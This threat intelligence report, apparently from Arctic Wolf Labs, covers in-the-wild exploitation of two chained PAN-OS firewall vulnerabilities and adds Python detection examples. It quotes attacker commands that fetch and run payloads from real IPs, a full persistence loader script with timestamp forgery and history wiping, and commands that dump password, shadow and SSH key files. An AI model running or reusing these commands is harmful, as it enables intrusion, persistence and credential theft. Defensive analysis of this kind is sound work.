On November 18, 2024, Palo Alto Networks disclosed two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in Palo Alto Networks OS (PAN-OS), the operating system used on their firewall devices. A day later, watchTowr released a report providing technical details on how to chain the two vulnerabilities together to achieve remote code execution. While they did not publish a proof-of-concept exploit, the details provided were sufficient to understand the exploitation process.
Several hours after the watchTowr report was published, Arctic Wolf Labs began to observe multiple intrusions affecting Palo Alto Networks devices. Based on the close timing of the watchTowr disclosure and additional evidence reviewed by Arctic Wolf Labs, we assess with moderate confidence that these intrusions likely involved the exploitation of CVE-2024-0012 chained together with CVE-2024-9474 for initial access.
We are sharing details of these intrusions to help organizations defend against these threats. Please note that we may add further detail to this article as we uncover additional information in our ongoing investigation.
What We Know About the Intrusions
Exploitation Details
Historically, threat actors have shown an interest in rapidly weaponizing newly disclosed vulnerabilities, especially for perimeter devices such as firewalls and VPN gateways. When the CVE-2024-3400 RCE vulnerability in PAN-OS was disclosed in April 2024 with a subsequent watchTowr technical writeup, threat actors were quick to begin mass exploitation using the available technical details.
With the disclosure of CVE-2024-0012/CVE-2024-9474, we observe a similar pattern of threat activity targeting PAN devices immediately following the publication of relevant technical details. As described in the most recent watchTowr article, a username field can be abused for the injection of arbitrary commands. This aligns with firewall log lines that we observed showing a Panorama console login where the username field includes a bash command enclosed in backticks:
1,2024/11/20 REDACTED_TIME,REDACTED_ID,SYSTEM,general,2562,2024/11/20 08:08:18,,general,,0,0,general,informational,"User `curl 46.8.226.75/1.txt -o /var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using http over an SSL connection",REDACTED_ID,0x8000000000000000,0,0,0,0,,gw11_2,0,0,REDACTED_TIME
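As an added example (not code from the Arctic Wolf report), the following Python parses system log rows in the CSV shape quoted above and flags logins whose username contains shell syntax such as the backticks seen here; the sample rows are constructed, with placeholder serials, IDs and a TEST-NET IP.

```python
import csv
import io
import re

# Constructed rows in the shape of the PAN-OS system log line quoted above; the
# serial, IDs and IP (203.0.113.10, TEST-NET) are placeholders, not real values.
SAMPLE_LOGS = (
    '1,2024/11/20 08:08:18,000000000000,SYSTEM,general,2562,2024/11/20 08:08:18,,'
    'general,,0,0,general,informational,"User `curl 203.0.113.10/1.txt -o '
    '/var/appweb/htdocs/unauth/1.php` logged in via Panorama from Console using '
    'http over an SSL connection",000000000000,0x8000000000000000,0,0,0,0,,gw11_2,0,0,'
    '2024/11/20 08:08:19\n'
    '1,2024/11/20 08:10:02,000000000000,SYSTEM,general,2562,2024/11/20 08:10:02,,'
    'general,,0,0,general,informational,"User admin logged in via Panorama from '
    'Console using http over an SSL connection",000000000000,0x8000000000000000,'
    '0,0,0,0,,gw11_2,0,0,2024/11/20 08:10:03\n'
)

DESC_FIELD = 14  # zero-based index of the quoted description column
LOGIN_RE = re.compile(r"^User (?P<user>.+?) logged in via ", re.DOTALL)
# Shell metacharacters that never belong in a real username.
SHELL_SYNTAX = re.compile(r"[`$|;&<>]")


def parse_system_log(text):
    """Yield (receive_time, description) for each SYSTEM-type row."""
    for row in csv.reader(io.StringIO(text)):
        if len(row) > DESC_FIELD and row[3] == "SYSTEM":
            yield row[1], row[DESC_FIELD]


def find_injected_logins(text):
    """Return (receive_time, username) for logins whose username carries shell
    syntax, the pattern of the command-injection log line shown above."""
    hits = []
    for when, desc in parse_system_log(text):
        m = LOGIN_RE.match(desc)
        if m and SHELL_SYNTAX.search(m.group("user")):
            hits.append((when, m.group("user")))
    return hits


if __name__ == "__main__":
    for when, user in find_injected_logins(SAMPLE_LOGS):
        print(f"{when}: suspicious login username {user!r}")
```

The same check can be pointed at exported system logs; a legitimate administrator name never contains a backtick, `$`, `|` or `;`.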
Notably, some files observed during this stage of the attack referenced watchTowr and CVE-2024-9474.
- watchTowr.js
- watchTowr.php
- watchTowr.txt
- CVE20249474.php
Command and Control
Arctic Wolf Labs observed several similar indicators of compromise in the most recent intrusions to what was seen with CVE-2024-3400. For example, as seen in the example command below, a common pattern is for threat actors to use curl or wget on compromised devices to download malicious payloads with IPv4 addresses in the URLs instead of domain names.
Several commands observed in the most recent intrusions indicated potential ingress tool transfer. One notable example is an instance where Sliver C2, an open-source alternative to the commonly used Cobalt Strike penetration testing tool, was retrieved:
wget --no-check-certificate -qO- https://104.131.69.106/vicidial/vicidial_sign.js | bash
The script (vicidial_sign.js), shown below, performs several key functions:
- Curl is used to download a file with a .js extension (up.js) from the 104.131.69[.]106 IP address and save it as /usr/lib/e_nas. If curl fails, it attempts to use wget instead.
- The touch command is used to set the modification and access timestamps of /usr/lib/e_nas to match those of /usr/lib/php.ini, likely to hide the recent modification to the file.
- Any existing content in the /etc/cron.hourly/telemetry.cron file is cleared out, and a script is written to the same path.
- The script then checks whether a process named cloud-lib is running (pgrep -x cloud-lib) and, if not, copies /usr/lib/e_nas to /usr/bin/cloud-lib, sets its permissions so that it is executable only by its owner (chmod 700), and runs it in the background.
- The permission of /etc/cron.hourly/telemetry.cron is changed to 755, allowing it to be executed.
- The touch command is used again to modify the timestamps of /etc/cron.hourly/telemetry.cron to match /etc/cron.hourly/logrotate_hourly, again likely to hide the modification to the file.
- Bash history is cleared to avoid evidence of the commands having been executed.
#!/bin/bash
curl -k https://104.131.69.106/vicidial/up.js -o /usr/lib/e_nas || wget --no-check-certificate https://104.131.69.106/vicidial/up.js -O /usr/lib/e_nas
touch -r /usr/lib/php.ini /usr/lib/e_nas
echo '' > /etc/cron.hourly/telemetry.cron
echo '#!/bin/sh' > /etc/cron.hourly/telemetry.cron
echo "bash -c 'if ! pgrep -x cloud-lib; then cp /usr/lib/e_nas /usr/bin/cloud-lib && chmod 700 /usr/bin/cloud-lib && (/bin/cloud-lib &); fi'" >> /etc/cron.hourly/telemetry.cron
chmod 755 /etc/cron.hourly/telemetry.cron
touch -r /etc/cron.hourly/logrotate_hourly /etc/cron.hourly/telemetry.cron
echo "" > /root/.bash_history
The file (up.js) outlined in the section above is a UPX-packed Sliver payload.
Data Exfiltration
In observed intrusions, threat actors issued multiple data staging and exfiltration commands to retrieve sensitive information from firewall devices. Most of the exfiltrated data consisted of firewall configuration files, which are known to include hashed credentials. Additionally, some attempts were made to exfiltrate the operating system passwd and shadow files.
Here is a selection of injected commands involving attempts to exfiltrate credentials and PAN configuration files:
cat /root/.ssh/authorized_keys > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php
cat /etc/networks > /var/appweb/htdocs/unauth/^[a-zA-Z]{6}.php
arp -a > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php
cat /etc/passwd > /var/appweb/htdocs/unauth//^[a-zA-Z]{6}.php
cat /etc/shadow > /var/appweb/htdocs/unauth/watchTowr.txt
In some instances, threat actors archived the output of these files using the tar command:
tar -zcvf /tmp/f03.png /opt/pancfg/mgmt/saved-configs
PHP Webshell
One of the payloads deployed was an obfuscated PHP webshell. The key functions are as follows:
- When an HTTP request is made, the webshell monitors for the use of an obfuscated POST parameter called $oNvPH071PRH, which is a base64 encoded and XOR encrypted string.
- Upon decryption of that POST parameter, the webshell looks for a provided payload parameter, which it proceeds to execute through the PHP eval function.
- The output is base64 encoded and XOR encrypted, then prefixed with a header consisting of the first 8 bytes of the md5sum of 18f566d952acaa29 and suffixed with a footer consisting of the last 8 bytes of the same md5sum.
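The header and footer described above are constants, so responses from the webshell can be recognised without knowing the XOR key. The Python below is an added example (not from the report) that derives both markers and checks whether an HTTP response body matches the framing; it assumes "8 bytes of the md5sum" means the first and last 8 hex characters of the digest text that md5sum prints, and the sample bodies are constructed.

```python
import base64
import binascii
import hashlib
import re

# The constant quoted in the write-up. The report says the header and footer are
# the first and last 8 bytes of its md5sum; this example assumes that means the
# hex digest text that md5sum prints, i.e. 8 hex characters each.
WEBSHELL_SEED = "18f566d952acaa29"
_DIGEST = hashlib.md5(WEBSHELL_SEED.encode()).hexdigest()
RESP_HEADER = _DIGEST[:8]
RESP_FOOTER = _DIGEST[-8:]


def looks_like_webshell_response(body):
    """True when an HTTP response body is framed as header + base64 blob + footer.
    The blob stays XOR-encrypted (the key is not in the report); only the framing
    is checked, which is enough to alert on traffic to the webshell."""
    if len(body) < 20 or not body.startswith(RESP_HEADER) or not body.endswith(RESP_FOOTER):
        return False
    inner = body[len(RESP_HEADER):-len(RESP_FOOTER)].strip()
    try:
        base64.b64decode(inner, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def scan_responses(bodies):
    """Return the indexes of response bodies that match the webshell framing."""
    return [i for i, b in enumerate(bodies) if looks_like_webshell_response(b)]


# Constructed sample traffic: two ordinary responses and one framed blob.
SAMPLE_BODIES = [
    "<html><body>login</body></html>",
    "{\"status\":\"ok\"}",
    RESP_HEADER + base64.b64encode(b"\x13\x37constructed-opaque-bytes").decode() + RESP_FOOTER,
]
```

The same two 8-character markers can be dropped into a proxy or IDS content rule for responses from /var/appweb/htdocs/unauth/ paths.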
Coinminer Activity
Some cases involved the deployment of XMRig on compromised firewall devices.
Shortly after the retrieval and execution of the file, network traffic reaching out to known XMRig IP addresses was observed.
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49VQVgmN9vYccj2tEgD7qgJPbLiGQcQ4uJxTRkTJUCZXRruR7HFD7keebLdYj6Bf5xZKhFKFANFxZhj3BCmRT9pe4NG325b+50000","pass":"REDACTED","agent":"XMRig/6.18.0 (Linux x86_64) libuv/1.44.1 gcc/9.3.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
How Arctic Wolf Protects its Customers
Arctic Wolf is committed to ending cyber risk with its customers, and when active ransomware campaigns are identified we move quickly to protect our customers.
Arctic Wolf Labs has leveraged threat intelligence around the exploitation of Palo Alto Networks devices to implement new detections in the Arctic Wolf Platform to protect Managed Detection and Response (MDR) customers. As we discover any new information, we will enhance our detections to account for additional indicators of compromise and techniques leveraged by this threat actor.
Remediation
For more details on recommended actions to address these vulnerabilities, see our security bulletin here.
Conclusion
Threat actors don’t wait around once new vulnerabilities are disclosed, especially for perimeter devices such as firewalls and VPN gateways. Across different campaigns and vulnerabilities, similar patterns emerge that help defenders react early in the kill chain.
The activities we’ve highlighted here are only scratching the surface. In this campaign, we’ve observed exfiltration of device configurations and credentials, along with the deployment of various payloads including coinminers, botnet malware, PHP webshells, and C2 frameworks. These observations illustrate the many ways that opportunistic threat actors attempt to leverage these vulnerabilities, for financial gain and otherwise.
Defenders should implement robust external monitoring and alerting for perimeter devices. In particular, close attention should be paid to unusual HTTP activity on such devices as it emerges. Additionally, as recommended by Palo Alto Networks, management interfaces of firewalls should not be exposed on the public internet, and should be restricted to only trusted internal IP addresses.